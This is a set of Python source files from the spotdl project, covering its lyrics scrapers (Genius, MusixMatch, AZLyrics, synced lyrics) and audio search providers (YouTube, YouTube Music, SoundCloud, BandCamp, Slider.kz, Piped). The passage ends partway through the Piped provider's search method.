for spotdl. """ File: spotdl/providers/lyrics/genius.py """ Genius Lyrics module. """ from typing import Dict, List, Optional import requests from bs4 import BeautifulSoup from spotdl.providers.lyrics.base import LyricsProvider from spotdl.utils.config import GlobalConfig __all__ = ["Genius"] class Genius(LyricsProvider): """ Genius lyrics provider class. """ def __init__(self, access_token: str): """ Init the lyrics provider search and set headers. """ super().__init__() self.access_token = access_token self.headers.update( { "Authorization": f"Bearer {self.access_token}", } ) self.session = requests.Session() self.session.headers.update(self.headers) def get_results(self, name: str, artists: List[str], **_) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ artists_str = ", ".join(artists) title = f"{name} - {artists_str}" search_response = self.session.get( "https://api.genius.com/search", params={"q": title}, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) results: Dict[str, str] = {} for hit in search_response.json()["response"]["hits"]: results[hit["result"]["full_title"]] = hit["result"]["id"] return results def extract_lyrics(self, url: str, **_) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ url = f"https://api.genius.com/songs/{url}" song_response = self.session.get( url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) url = song_response.json()["response"]["song"]["url"] soup = None counter = 0 while counter < 4: genius_page_response = self.session.get( url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) if not genius_page_response.ok: counter += 1 continue soup = BeautifulSoup( genius_page_response.text.replace("<br/>", "\n"), "html.parser" ) break if soup is None: return None lyrics_div = soup.select_one("div.lyrics") lyrics_containers = soup.select("div[class^=Lyrics__Container]") # Get lyrics if lyrics_div: lyrics = lyrics_div.get_text() elif lyrics_containers: lyrics = "\n".join(con.get_text() for con in lyrics_containers) else: return None if not lyrics: return None # Clean lyrics lyrics = lyrics.strip() # Remove desc at the beginning if it exists for to_remove in ["desc", "Desc"]: lyrics.replace(to_remove, "", 1) return lyrics File: spotdl/providers/lyrics/musixmatch.py """ MusixMatch lyrics provider. """ from typing import Dict, List, Optional from urllib.parse import quote import requests from bs4 import BeautifulSoup from spotdl.providers.lyrics.base import LyricsProvider from spotdl.utils.config import GlobalConfig __all__ = ["MusixMatch"] class MusixMatch(LyricsProvider): """ MusixMatch lyrics provider class. """ def extract_lyrics(self, url: str, **_) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ lyrics_resp = requests.get( url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) lyrics_soup = BeautifulSoup(lyrics_resp.text, "html.parser") lyrics_paragraphs = lyrics_soup.select("p.mxm-lyrics__content") lyrics = "\n".join(i.get_text() for i in lyrics_paragraphs) return lyrics def get_results(self, name: str, artists: List[str], **kwargs) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ track_search = kwargs.get("track_search", False) artists_str = ", ".join( artist for artist in artists if artist.lower() not in name.lower() ) # quote the query so that it's safe to use in a url # e.g "Au/Ra" -> "Au%2FRa" query = quote(f"{name} - {artists_str}", safe="") # search the `tracks page` if track_search is True if track_search: query += "/tracks" search_url = f"https://www.musixmatch.com/search/{query}" search_resp = requests.get( search_url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) search_soup = BeautifulSoup(search_resp.text, "html.parser") song_url_tag = search_soup.select("a[href^='/lyrics/']") if not song_url_tag: # song_url_tag being None means no results were found on the # All Results page, therefore, we use `track_search` to # search the tracks page. # track_serach being True means we are already searching the tracks page. if track_search: return {} return self.get_results(name, artists, track_search=True) results: Dict[str, str] = {} for tag in song_url_tag: results[tag.get_text()] = "https://www.musixmatch.com" + str( tag.get("href", "") ) return results File: spotdl/providers/lyrics/synced.py """ Synced lyrics provider using the syncedlyrics library """ from typing import Dict, List, Optional import requests import syncedlyrics from spotdl.providers.lyrics.base import LyricsProvider __all__ = ["Synced"] class Synced(LyricsProvider): """ Lyrics provider for synced lyrics using the syncedlyrics library Currently supported websites: Deezer, NetEase """ def get_results(self, name: str, artists: List[str], **kwargs) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ raise NotImplementedError def extract_lyrics(self, url: str, **kwargs) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ raise NotImplementedError def get_lyrics(self, name: str, artists: List[str], **kwargs) -> Optional[str]: """ Try to get lyrics using syncedlyrics ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ try: lyrics = syncedlyrics.search( f"{name} - {artists[0]}", synced_only=not kwargs.get("allow_plain_format", True), ) return lyrics except requests.exceptions.SSLError: # Max retries reached return None except TypeError: # Error at syncedlyrics.providers.musixmatch L89 - # Because `body` is occasionally an empty list instead of a dictionary. # We get this error when allow_plain_format is set to True, # and there are no synced lyrics present # Because its empty, we know there are no lyrics return None File: spotdl/providers/lyrics/__init__.py """ Lyrics providers for spotdl. """ from spotdl.providers.lyrics.azlyrics import AzLyrics from spotdl.providers.lyrics.base import LyricsProvider from spotdl.providers.lyrics.genius import Genius from spotdl.providers.lyrics.musixmatch import MusixMatch from spotdl.providers.lyrics.synced import Synced __all__ = ["AzLyrics", "Genius", "MusixMatch", "Synced", "LyricsProvider"] File: spotdl/providers/lyrics/base.py """ Base module for all other lyrics providers. """ import logging from typing import Dict, List, Optional from spotdl.utils.formatter import ratio, slugify from spotdl.utils.matching import based_sort __all__ = ["LyricsProvider"] logger = logging.getLogger(__name__) class LyricsProvider: """ Base class for all other lyrics providers. """ def __init__(self): """ Init the lyrics provider searchand set headers. """ self.headers = { "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache", "sec-ch-ua": '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"', "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36", "Accept": "*/*", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Accept-Language": "en-US;q=0.8,en;q=0.7", } def get_results(self, name: str, artists: List[str], **kwargs) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ raise NotImplementedError def extract_lyrics(self, url: str, **kwargs) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ raise NotImplementedError def get_lyrics(self, name: str, artists: List[str], **kwargs) -> Optional[str]: """ Returns the lyrics for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ try: results = self.get_results(name, artists, **kwargs) except Exception as exc: logger.debug( "%s: Failed to get results for %s - %s: %s", self.name, name, ", ".join(artists), exc, ) return None if not results: return None results_with_score = {} for title, url in results.items(): result_title = slugify(title) match_title = slugify(f"{name} - {', '.join(artists)}") res_list, song_list = based_sort( result_title.split("-"), match_title.split("-") ) result_title, match_title = "-".join(res_list), "-".join(song_list) score = ratio(result_title, match_title) results_with_score[score] = url if not results_with_score: return None # Get song url with highest title match score, url = max(results_with_score.items(), key=lambda x: x[0]) # Only return lyrics if the title match is at least 55% if score < 55: return None try: return self.extract_lyrics(url, **kwargs) except Exception as exc: logger.debug( "%s: Failed to extract lyrics from %s: %s", self.name, url, exc ) return None @property def name(self) -> str: """ Returns the name of the lyrics provider. """ return self.__class__.__name__ File: spotdl/providers/lyrics/azlyrics.py """ AZLyrics lyrics module. """ from typing import Dict, List, Optional import requests from bs4 import BeautifulSoup from spotdl.providers.lyrics.base import LyricsProvider __all__ = ["AzLyrics"] class AzLyrics(LyricsProvider): """ AZLyrics lyrics provider class. """ def __init__(self): super().__init__() self.session = requests.Session() self.session.headers.update(self.headers) self.x_code = self.get_x_code() def get_results(self, name: str, artists: List[str], **_) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ if self.x_code is None: self.x_code = self.get_x_code() if self.x_code is None: return {} # Join every artist by comma in artists artist_str = ", ".join(artist for artist in artists if artist) params = { "q": f"{artist_str} - {name}", "x": self.x_code, } counter = 0 soup = None while counter < 4: try: response = self.session.get( "https://search.azlyrics.com/search.php", params=params ) except requests.ConnectionError: continue if not response.ok: counter += 1 continue soup = BeautifulSoup(response.content, "html.parser") break if soup is None: return {} td_tags = soup.find_all("td") if len(td_tags) == 0: return {} results = {} for td_tag in td_tags: a_tags = td_tag.find_all("a", href=True) if len(a_tags) == 0: continue a_tag = a_tags[0] url = a_tag["href"].strip() if url == "": continue title = td_tag.find("span").get_text().strip() artist = td_tag.find("b").get_text().strip() results[f"{artist} - {title}"] = url return results def extract_lyrics(self, url: str, **_) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ response = self.session.get(url) soup = BeautifulSoup(response.content, "html.parser") # Find all divs that don't have a class div_tags = soup.find_all("div", class_=False, id_=False) # Find the div with the longest text lyrics_div = sorted(div_tags, key=lambda x: len(x.text))[-1] # extract lyrics from div and clean it up lyrics = lyrics_div.get_text().strip() return lyrics def get_x_code(self) -> Optional[str]: """ Returns the x_code used by AZLyrics. ### Returns - The x_code used by AZLyrics or None if it couldn't be retrieved. """ x_code = None try: self.session.get("https://www.azlyrics.com/") resp = self.session.get("https://www.azlyrics.com/geo.js") # extract value from js code js_code = resp.text start_index = js_code.find('value"') + 9 end_index = js_code[start_index:].find('");') x_code = js_code[start_index : start_index + end_index] except requests.ConnectionError: pass return x_code File: spotdl/providers/audio/bandcamp.py """ BandCamp module for downloading and searching songs. """ import logging from typing import Any, Dict, List, Optional, Tuple import requests from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result from spotdl.utils.config import GlobalConfig __all__ = ["BandCamp"] logger = logging.getLogger(__name__) class BandCampTrack: """ BandCamp track class based on the bandcamp_api library """ def __init__(self, artist_id: int, track_id: int): # object info self.type = "track" # track information self.track_id: int = 0 self.track_title: str = "" self.track_number: int = 0 self.track_duration_seconds: float = 0.00 self.track_streamable: Optional[bool] = None self.has_lyrics: Optional[bool] = None self.lyrics: str = "" self.is_price_set: Optional[bool] = None self.price: dict = {} self.require_email: Optional[bool] = None self.is_purchasable: Optional[bool] = None self.is_free: Optional[bool] = None self.is_preorder: Optional[bool] = None self.tags: list = [] self.track_url: str = "" # art self.art_id: int = 0 self.art_url: str = "" # artist information self.artist_id: int = 0 self.artist_title: str = "" # album information self.album_id: int = 0 self.album_title: str = "" # label self.label_id: int = 0 self.label_title: str = "" # about self.about: str = "" self.credits: str = "" self.date_released_unix: int = 0 # advanced self.date_last_modified_unix: int = 0 self.date_published_unix: int = 0 self.supporters: list = [] response = requests.get( url="https://bandcamp.com/api/mobile/25/tralbum_details?band_id=" + str(artist_id) + "&tralbum_id=" + str(track_id) + "&tralbum_type=t", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) result = response.json() self.track_id = result["id"] self.track_title = result["title"] self.track_number = result["tracks"][0]["track_num"] self.track_duration_seconds = result["tracks"][0]["duration"] self.track_streamable = result["tracks"][0]["is_streamable"] self.has_lyrics = result["tracks"][0]["has_lyrics"] # getting lyrics, if there is any if self.has_lyrics is True: resp = requests.get( "https://bandcamp.com/api/mobile/25/tralbum_lyrics?tralbum_id=" + str(self.track_id) + "&tralbum_type=t", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) rjson = resp.json() self.lyrics = rjson["lyrics"][str(self.track_id)] self.is_price_set = result["is_set_price"] self.price = {"currency": result["currency"], "amount": result["price"]} self.require_email = result["require_email"] self.is_purchasable = result["is_purchasable"] self.is_free = result["free_download"] self.is_preorder = result["is_preorder"] for tag in result["tags"]: self.tags.append(tag["name"]) self.art_id = result["art_id"] self.art_url = "https://f4.bcbits.com/img/a" + str(self.art_id) + "_0.jpg" self.artist_id = result["band"]["band_id"] self.artist_title = result["band"]["name"] self.album_id = result["album_id"] self.album_title = result["album_title"] self.label_id = result["label_id"] self.label_title = result["label"] self.about = result["about"] self.credits = result["credits"] self.date_released_unix = result["release_date"] self.track_url = result["bandcamp_url"] def search(search_string: str = ""): """ I got this api url from the iOS app needs a way of removing characters that will screw up an url keep url safe characters ### Arguments - search_string: The search term to search for. ### Returns - A list of artist and track ids if found """ response = requests.get( "https://bandcamp.com/api/fuzzysearch/2/app_autocomplete?q=" + search_string + "&param_with_locations=true", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) results = response.json()["results"] return_results: List[Tuple[str, str]] = [] for item in results: if item["type"] == "t": return_results.append((item["band_id"], item["id"])) return return_results class BandCamp(AudioProvider): """ SoundCloud audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def get_results(self, search_term: str, *_args, **_kwargs) -> List[Result]: """ Get results from slider.kz ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. ### Returns - A list of slider.kz results if found, None otherwise. """ try: results = search(search_term) except KeyError: return [] except Exception as exc: logger.error("Failed to get results from BandCamp", exc_info=exc) return [] simplified_results: List[Result] = [] for result in results: track = BandCampTrack(int(result[0]), int(result[1])) simplified_results.append( Result( source="bandcamp", url=track.track_url, verified=False, name=track.track_title, duration=track.track_duration_seconds, author=track.artist_title, result_id=track.track_url, search_query=search_term, album=track.album_title, artists=tuple(track.artist_title.split(", ")), ) ) return simplified_results File: spotdl/providers/audio/youtube.py """ Youtube module for downloading and searching songs. """ from typing import Any, Dict, List, Optional from pytube import Search from pytube import YouTube as PyTube from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result __all__ = ["YouTube"] class YouTube(AudioProvider): """ YouTube audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def get_results( self, search_term: str, *_args, **_kwargs ) -> List[Result]: # pylint: disable=W0221 """ Get results from YouTube ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. ### Returns - A list of YouTube results if found, None otherwise. """ search_results: Optional[List[PyTube]] = Search(search_term).results if not search_results: return [] results = [] for result in search_results: if result.watch_url: try: duration = result.length except Exception: duration = 0 try: views = result.views except Exception: views = 0 results.append( Result( source=self.name, url=result.watch_url, verified=False, name=result.title, duration=duration, author=result.author, search_query=search_term, views=views, result_id=result.video_id, ) ) return results File: spotdl/providers/audio/sliderkz.py """ SliderKZ module for downloading and searching songs. """ import logging from typing import Any, Dict, List import requests from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result from spotdl.utils.config import GlobalConfig __all__ = ["SliderKZ"] logger = logging.getLogger(__name__) HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" } class SliderKZ(AudioProvider): """ Slider.kz audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def get_results(self, search_term: str, *_args, **_kwargs) -> List[Result]: """ Get results from slider.kz ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. ### Returns - A list of slider.kz results if found, None otherwise. """ search_results = None max_retries = 0 while not search_results and max_retries < 3: try: search_response = requests.get( url="https://hayqbhgr.slider.kz/vk_auth.php?q=" + search_term, headers=HEADERS, timeout=5, proxies=GlobalConfig.get_parameter("proxies"), ) # Check if the response is valid if len(search_response.text) > 30: # Set the search results to the json response # effectively breaking out of the loop search_results = search_response.json() except Exception as exc: logger.debug( "Slider.kz search failed for query %s with error: %s. Retrying...", search_term, exc, ) max_retries += 1 if not search_results: logger.debug("Slider.kz search failed for query %s", search_term) return [] results = [] for result in search_results["audios"][""]: # urls from slider.kz sometimes are relative, so we need to add the domain if "https://" not in result["url"]: result["url"] = "https://hayqbhgr.slider.kz/" + result["url"] results.append( Result( source="slider.kz", url=result.get("url"), verified=False, name=result.get("tit_art"), duration=int(result.get("duration", -9999)), author="slider.kz", result_id=result.get("id"), views=1, ) ) return results File: spotdl/providers/audio/__init__.py """ Audio providers for spotdl. """ from spotdl.providers.audio.bandcamp import BandCamp from spotdl.providers.audio.base import ( ISRC_REGEX, AudioProvider, AudioProviderError, YTDLLogger, ) from spotdl.providers.audio.piped import Piped from spotdl.providers.audio.sliderkz import SliderKZ from spotdl.providers.audio.soundcloud import SoundCloud from spotdl.providers.audio.youtube import YouTube from spotdl.providers.audio.ytmusic import YouTubeMusic __all__ = [ "YouTube", "YouTubeMusic", "SliderKZ", "SoundCloud", "BandCamp", "Piped", "AudioProvider", "AudioProviderError", "YTDLLogger", "ISRC_REGEX", ] File: spotdl/providers/audio/soundcloud.py """ SoundCloud module for downloading and searching songs. """ import logging import re from itertools import islice from typing import Any, Dict, List from soundcloud import SoundCloud as SoundCloudClient from soundcloud.resource.track import Track from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result __all__ = ["SoundCloud"] logger = logging.getLogger(__name__) class SoundCloud(AudioProvider): """ SoundCloud audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def __init__(self, *args: Any, **kwargs: Any) -> None: """ Initialize the SoundCloud API ### Arguments - args: Arguments passed to the `AudioProvider` class. - kwargs: Keyword arguments passed to the `AudioProvider` class. """ super().__init__(*args, **kwargs) self.client = SoundCloudClient() def get_results(self, search_term: str, *_args, **_kwargs) -> List[Result]: """ Get results from slider.kz ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. ### Returns - A list of slider.kz results if found, None otherwise. """ results = list(islice(self.client.search(search_term), 20)) regex = r"^(.+?)-|(\(\w+[\s\S]*\))" # Because anyone can post on soundcloud, we do another search with an edited search # The regex removes anything in brackets and the artist(s)'s name(s) if in the name edited_search_term = re.sub(regex, "", search_term) results.extend(list(islice(self.client.search(edited_search_term), 20))) # Simplify results simplified_results = [] for result in results: if not isinstance(result, Track): continue # Ignore results that are not playable if "/preview/" in result.media.transcodings[0].url: continue album = self.client.get_track_albums(result.id) try: album_name = next(album).title except StopIteration: album_name = None simplified_results.append( Result( source="soundcloud", url=result.permalink_url, name=result.title, verified=result.user.verified, duration=result.full_duration, author=result.user.username, result_id=str(result.id), isrc_search=False, search_query=search_term, views=result.playback_count, explicit=False, album=album_name, ) ) return simplified_results File: spotdl/providers/audio/ytmusic.py """ YTMusic module for downloading and searching songs. """ from typing import Any, Dict, List from ytmusicapi import YTMusic from spotdl.providers.audio.base import ISRC_REGEX, AudioProvider from spotdl.types.result import Result from spotdl.utils.formatter import parse_duration __all__ = ["YouTubeMusic"] class YouTubeMusic(AudioProvider): """ YouTube Music audio provider class """ SUPPORTS_ISRC = True GET_RESULTS_OPTS: List[Dict[str, Any]] = [ {"filter": "songs", "ignore_spelling": True, "limit": 50}, {"filter": "videos", "ignore_spelling": True, "limit": 50}, ] def __init__(self, *args: Any, **kwargs: Any) -> None: """ Initialize the YouTube Music API ### Arguments - args: Arguments passed to the `AudioProvider` class. - kwargs: Keyword arguments passed to the `AudioProvider` class. """ super().__init__(*args, **kwargs) self.client = YTMusic(language="de") def get_results(self, search_term: str, **kwargs) -> List[Result]: """ Get results from YouTube Music API and simplify them ### Arguments - search_term: The search term to search for. - kwargs: other keyword arguments passed to the `YTMusic.search` method. ### Returns - A list of simplified results (dicts) """ is_isrc_result = ISRC_REGEX.search(search_term) is not None # if is_isrc_result: # print("FORCEFULLY SETTING FILTER TO SONGS") # kwargs["filter"] = "songs" search_results = self.client.search(search_term, **kwargs) # Simplify results results = [] for result in search_results: if ( result is None or result.get("videoId") is None or result.get("artists") in [[], None] ): continue results.append( Result( source=self.name, url=( f'https://{"music" if result["resultType"] == "song" else "www"}' f".youtube.com/watch?v={result['videoId']}" ), verified=result.get("resultType") == "song", name=result["title"], result_id=result["videoId"], author=result["artists"][0]["name"], artists=tuple(map(lambda a: a["name"], result["artists"])), duration=parse_duration(result.get("duration")), isrc_search=is_isrc_result, search_query=search_term, explicit=result.get("isExplicit"), album=( result.get("album", {}).get("name") if result.get("album") else None ), ) ) return results File: spotdl/providers/audio/base.py """ Base audio provider module. """ import logging import re import shlex from typing import Any, Dict, List, Optional, Tuple from yt_dlp import YoutubeDL from spotdl.types.result import Result from spotdl.types.song import Song from spotdl.utils.config import get_temp_path from spotdl.utils.formatter import ( args_to_ytdlp_options, create_search_query, create_song_title, ) from spotdl.utils.matching import get_best_matches, order_results __all__ = ["AudioProviderError", "AudioProvider", "ISRC_REGEX", "YTDLLogger"] logger = logging.getLogger(__name__) class AudioProviderError(Exception): """ Base class for all exceptions related to audio searching/downloading. """ class YTDLLogger: """ Custom YT-dlp logger. """ def debug(self, msg): """ YTDL uses this to print debug messages. """ pass # pylint: disable=W0107 def warning(self, msg): """ YTDL uses this to print warnings. """ pass # pylint: disable=W0107 def error(self, msg): """ YTDL uses this to print errors. """ raise AudioProviderError(msg) ISRC_REGEX = re.compile(r"^[A-Z]{2}-?\w{3}-?\d{2}-?\d{5}$") class AudioProvider: """ Base class for all other providers. Provides some common functionality. Handles the yt-dlp audio handler. """ SUPPORTS_ISRC: bool GET_RESULTS_OPTS: List[Dict[str, Any]] def __init__( self, output_format: str = "mp3", cookie_file: Optional[str] = None, search_query: Optional[str] = None, filter_results: bool = True, yt_dlp_args: Optional[str] = None, ) -> None: """ Base class for audio providers. ### Arguments - output_directory: The directory to save the downloaded songs to. - output_format: The format to save the downloaded songs in. - cookie_file: The path to a file containing cookies to be used by YTDL. - search_query: The query to use when searching for songs. - filter_results: Whether to filter results. """ self.output_format = output_format self.cookie_file = cookie_file self.search_query = search_query self.filter_results = filter_results if self.output_format == "m4a": ytdl_format = "bestaudio[ext=m4a]/bestaudio/best" elif self.output_format == "opus": ytdl_format = "bestaudio[ext=webm]/bestaudio/best" else: ytdl_format = "bestaudio" yt_dlp_options = { "format": ytdl_format, "quiet": True, "no_warnings": True, "encoding": "UTF-8", "logger": YTDLLogger(), "cookiefile": self.cookie_file, "outtmpl": str((get_temp_path() / "%(id)s.%(ext)s").resolve()), "retries": 5, } if yt_dlp_args: yt_dlp_options = args_to_ytdlp_options( shlex.split(yt_dlp_args), yt_dlp_options ) self.audio_handler = YoutubeDL(yt_dlp_options) def get_results(self, search_term: str, **kwargs) -> List[Result]: """ Get results from audio provider. ### Arguments - search_term: The search term to use. - kwargs: Additional arguments. ### Returns - A list of results. """ raise NotImplementedError def get_views(self, url: str) -> int: """ Get the number of views for a video. ### Arguments - url: The url of the video. ### Returns - The number of views. """ data = self.get_download_metadata(url) return data["view_count"] def search(self, song: Song, only_verified: bool = False) -> Optional[str]: """ Search for a song and return best match. ### Arguments - song: The song to search for. ### Returns - The url of the best match or None if no match was found. """ # Create initial search query search_query = create_song_title(song.name, song.artists).lower() if self.search_query: search_query = create_search_query( song, self.search_query, False, None, True ) logger.debug("[%s] Searching for %s", song.song_id, search_query) isrc_urls: List[str] = [] # search for song using isrc if it's available if song.isrc and self.SUPPORTS_ISRC and not self.search_query: isrc_results = self.get_results(song.isrc) if only_verified: isrc_results = [result for result in isrc_results if result.verified] logger.debug( "[%s] Filtered to %s verified ISRC results", song.song_id, len(isrc_results), ) isrc_urls = [result.url for result in isrc_results] logger.debug( "[%s] Found %s results for ISRC %s", song.song_id, len(isrc_results), song.isrc, ) if len(isrc_results) == 1 and isrc_results[0].verified: # If we only have one verified result, return it # What's the chance of it being wrong? logger.debug( "[%s] Returning only ISRC result %s", song.song_id, isrc_results[0].url, ) return isrc_results[0].url if len(isrc_results) > 0: sorted_isrc_results = order_results( isrc_results, song, self.search_query ) # get the best result, if the score is above 80 return it best_isrc_results = sorted( sorted_isrc_results.items(), key=lambda x: x[1], reverse=True ) logger.debug( "[%s] Filtered to %s ISRC results", song.song_id, len(best_isrc_results), ) if len(best_isrc_results) > 0: best_isrc = best_isrc_results[0] if best_isrc[1] > 80.0: logger.debug( "[%s] Best ISRC result is %s with score %s", song.song_id, best_isrc[0].url, best_isrc[1], ) return best_isrc[0].url results: Dict[Result, float] = {} for options in self.GET_RESULTS_OPTS: # Query YTM by songs only first, this way if we get correct result on the first try # we don't have to make another request search_results = self.get_results(search_query, **options) if only_verified: search_results = [ result for result in search_results if result.verified ] logger.debug( "[%s] Found %s results for search query %s with options %s", song.song_id, len(search_results), search_query, options, ) # Check if any of the search results is in the # first isrc results, since they are not hashable we have to check # by name isrc_result = next( (result for result in search_results if result.url in isrc_urls), None, ) if isrc_result: logger.debug( "[%s] Best ISRC result is %s", song.song_id, isrc_result.url ) return isrc_result.url logger.debug( "[%s] Have to filter results: %s", song.song_id, self.filter_results ) if self.filter_results: # Order results new_results = order_results(search_results, song, self.search_query) else: new_results = {} if len(search_results) > 0: new_results = {search_results[0]: 100.0} logger.debug("[%s] Filtered to %s results", song.song_id, len(new_results)) # song type results are always more accurate than video type, # so if we get score of 80 or above # we are almost 100% sure that this is the correct link if len(new_results) != 0: # get the result with highest score best_result, best_score = self.get_best_result(new_results) logger.debug( "[%s] Best result is %s with score %s", song.song_id, best_result.url, best_score, ) if best_score >= 80 and best_result.verified: logger.debug( "[%s] Returning verified best result %s with score %s", song.song_id, best_result.url, best_score, ) return best_result.url # Update final results with new results results.update(new_results) # No matches found if not results: logger.debug("[%s] No results found", song.song_id) return None # get the result with highest score best_result, best_score = self.get_best_result(results) logger.debug( "[%s] Returning best result %s with score %s", song.song_id, best_result.url, best_score, ) return best_result.url def get_best_result(self, results: Dict[Result, float]) -> Tuple[Result, float]: """ Get the best match from the results using views and average match ### Arguments - results: A dictionary of results and their scores ### Returns - The best match URL and its score """ best_results = get_best_matches(results, 8) # If we have only one result, return it if len(best_results) == 1: return best_results[0][0], best_results[0][1] # Initial best result based on the average match best_result = best_results[0] # If the best result has a score higher than 80% # and it's a isrc search, return it if best_result[1] > 80 and best_result[0].isrc_search: return best_result[0], best_result[1] # If we have more than one result, # return the one with the highest score # and most views if len(best_results) > 1: views: List[int] = [] for best_result in best_results: if best_result[0].views: views.append(best_result[0].views) else: views.append(self.get_views(best_result[0].url)) highest_views = max(views) lowest_views = min(views) if highest_views in (0, lowest_views): return best_result[0], best_result[1] weighted_results: List[Tuple[Result, float]] = [] for index, best_result in enumerate(best_results): result_views = views[index] views_score = ( (result_views - lowest_views) / (highest_views - lowest_views) ) * 15 score = min(best_result[1] + views_score, 100) weighted_results.append((best_result[0], score)) # Now we return the result with the highest score return max(weighted_results, key=lambda x: x[1]) return best_result[0], best_result[1] def get_download_metadata(self, url: str, download: bool = False) -> Dict: """ Get metadata for a download using yt-dlp. ### Arguments - url: The url to get metadata for. ### Returns - A dictionary containing the metadata. """ try: data = self.audio_handler.extract_info(url, download=download) if data: return data except Exception as exception: logger.debug(exception) raise AudioProviderError(f"YT-DLP download error - {url}") from exception raise AudioProviderError(f"No metadata found for the provided url {url}") @property def name(self) -> str: """ Get the name of the provider. ### Returns - The name of the provider. """ return self.__class__.__name__ File: spotdl/providers/audio/piped.py """ Piped module for downloading and searching songs. """ import logging import shlex from typing import Any, Dict, List, Optional import requests from yt_dlp import YoutubeDL from spotdl.providers.audio.base import ( ISRC_REGEX, AudioProvider, AudioProviderError, YTDLLogger, ) from spotdl.types.result import Result from spotdl.utils.config import GlobalConfig, get_temp_path from spotdl.utils.formatter import args_to_ytdlp_options __all__ = ["Piped"] logger = logging.getLogger(__name__) HEADERS = { "accept": "*/*", } class Piped(AudioProvider): """ YouTube Music audio provider class """ SUPPORTS_ISRC = True GET_RESULTS_OPTS: List[Dict[str, Any]] = [ {"filter": "music_songs"}, {"filter": "music_videos"}, ] def __init__( # pylint: disable=super-init-not-called self, output_format: str = "mp3", cookie_file: Optional[str] = None, search_query: Optional[str] = None, filter_results: bool = True, yt_dlp_args: Optional[str] = None, ) -> None: """ Pipe audio provider class ### Arguments - output_directory: The directory to save the downloaded songs to. - output_format: The format to save the downloaded songs in. - cookie_file: The path to a file containing cookies to be used by YTDL. - search_query: The query to use when searching for songs. - filter_results: Whether to filter results. """ self.output_format = output_format self.cookie_file = cookie_file self.search_query = search_query self.filter_results = filter_results if self.output_format == "m4a": ytdl_format = "best[ext=m4a]/best" elif self.output_format == "opus": ytdl_format = "best[ext=webm]/best" else: ytdl_format = "best" yt_dlp_options = { "format": ytdl_format, "quiet": True, "no_warnings": True, "encoding": "UTF-8", "logger": YTDLLogger(), "cookiefile": self.cookie_file, "outtmpl": f"{get_temp_path()}/%(id)s.%(ext)s", "retries": 5, } if yt_dlp_args: user_options = args_to_ytdlp_options(shlex.split(yt_dlp_args)) yt_dlp_options.update(user_options) self.audio_handler = YoutubeDL(yt_dlp_options) self.session = requests.Session() def get_results(self, search_term: str, **kwargs) -> List[Result]: """ Get results from YouTube Music API and simplify them ### Arguments - search_term: The search term to search for. - kwargs: other keyword arguments passed to the `YTMusic.search` method. ### Returns - A list of simplified results (dicts) """ if kwargs is None: kwargs = {} params = {"q": search_term, 